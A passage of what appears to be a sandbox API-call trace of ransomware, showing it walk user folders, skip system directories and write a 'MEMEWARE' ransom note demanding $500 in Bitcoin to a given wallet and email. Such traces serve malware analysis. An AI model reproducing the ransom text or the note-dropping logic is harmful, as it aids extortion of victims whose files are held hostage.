(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.424] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.424] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.424] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.424] CloseHandle (hObject=0x154) returned 1 [0087.424] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.424] lstrcmpiW (lpString1="itl", lpString2="Windows") returned -1 [0087.424] lstrcmpiW (lpString1="itl", lpString2="Program Files") returned -1 [0087.424] lstrcmpiW (lpString1="itl", lpString2="Program Files (x86)") returned -1 [0087.424] lstrcmpiW (lpString1="itl", lpString2="$Recycle.bin") returned 1 [0087.424] lstrcmpiW (lpString1="itl", lpString2="System Volume Information") returned -1 [0087.424] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl") returned 109 [0087.424] lstrcmpW (lpString1="itl", lpString2=".") returned 1 [0087.424] lstrcmpW (lpString1="itl", lpString2="..") returned 1 [0087.424] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*") returned 111 [0087.424] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.425] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.425] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.425] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.425] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.425] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.425] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\.") returned 111 [0087.425] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.425] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.425] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.425] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.425] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.425] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.425] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.425] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\..") returned 112 [0087.425] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.425] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.425] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.425] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.425] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\RESTORE_FILES.txt") returned 127 [0087.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\itl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.426] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.426] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.426] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.426] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.427] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.427] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.427] CloseHandle (hObject=0x154) returned 1 [0087.427] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.427] lstrcmpiW (lpString1="nrw", lpString2="Windows") returned -1 [0087.427] lstrcmpiW (lpString1="nrw", lpString2="Program Files") returned -1 [0087.427] lstrcmpiW (lpString1="nrw", lpString2="Program Files (x86)") returned -1 [0087.427] lstrcmpiW (lpString1="nrw", lpString2="$Recycle.bin") returned 1 [0087.427] lstrcmpiW (lpString1="nrw", lpString2="System Volume Information") returned -1 [0087.427] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw") returned 109 [0087.427] lstrcmpW (lpString1="nrw", lpString2=".") returned 1 [0087.427] lstrcmpW (lpString1="nrw", lpString2="..") returned 1 [0087.427] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*") returned 111 [0087.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.427] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.427] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.427] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.427] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.427] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.427] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\.") returned 111 [0087.427] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.427] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.427] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.428] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.428] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.428] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.428] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.428] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\..") returned 112 [0087.428] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.428] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.428] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.428] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.428] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\RESTORE_FILES.txt") returned 127 [0087.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\nrw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.429] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.429] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.430] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.430] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.430] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.430] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.430] CloseHandle (hObject=0x154) returned 1 [0087.430] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.430] lstrcmpiW (lpString1="prt", lpString2="Windows") returned -1 [0087.430] lstrcmpiW (lpString1="prt", lpString2="Program Files") returned 1 [0087.430] lstrcmpiW (lpString1="prt", lpString2="Program Files (x86)") returned 1 [0087.430] lstrcmpiW (lpString1="prt", lpString2="$Recycle.bin") returned 1 [0087.430] lstrcmpiW (lpString1="prt", lpString2="System Volume Information") returned -1 [0087.430] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt") returned 109 [0087.430] lstrcmpW (lpString1="prt", lpString2=".") returned 1 [0087.430] lstrcmpW (lpString1="prt", lpString2="..") returned 1 [0087.430] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*") returned 111 [0087.430] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.431] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.431] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.431] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.431] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.431] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.431] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\.") returned 111 [0087.431] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.431] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.431] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.431] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.431] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.431] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.431] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.431] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\..") returned 112 [0087.431] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.431] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.431] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.431] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.431] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\RESTORE_FILES.txt") returned 127 [0087.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\prt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.432] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.432] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.433] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.433] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.433] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.433] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.433] CloseHandle (hObject=0x154) returned 1 [0087.433] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.433] lstrcmpiW (lpString1="spn", lpString2="Windows") returned -1 [0087.433] lstrcmpiW (lpString1="spn", lpString2="Program Files") returned 1 [0087.433] lstrcmpiW (lpString1="spn", lpString2="Program Files (x86)") returned 1 [0087.434] lstrcmpiW (lpString1="spn", lpString2="$Recycle.bin") returned 1 [0087.434] lstrcmpiW (lpString1="spn", lpString2="System Volume Information") returned -1 [0087.434] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn") returned 109 [0087.434] lstrcmpW (lpString1="spn", lpString2=".") returned 1 [0087.434] lstrcmpW (lpString1="spn", lpString2="..") returned 1 [0087.434] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*") returned 111 [0087.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.434] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.434] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.434] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.434] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.434] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.434] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\.") returned 111 [0087.434] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.434] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.434] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.434] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.434] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.434] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.434] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.434] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\..") returned 112 [0087.434] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.434] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.434] FindNextFileW 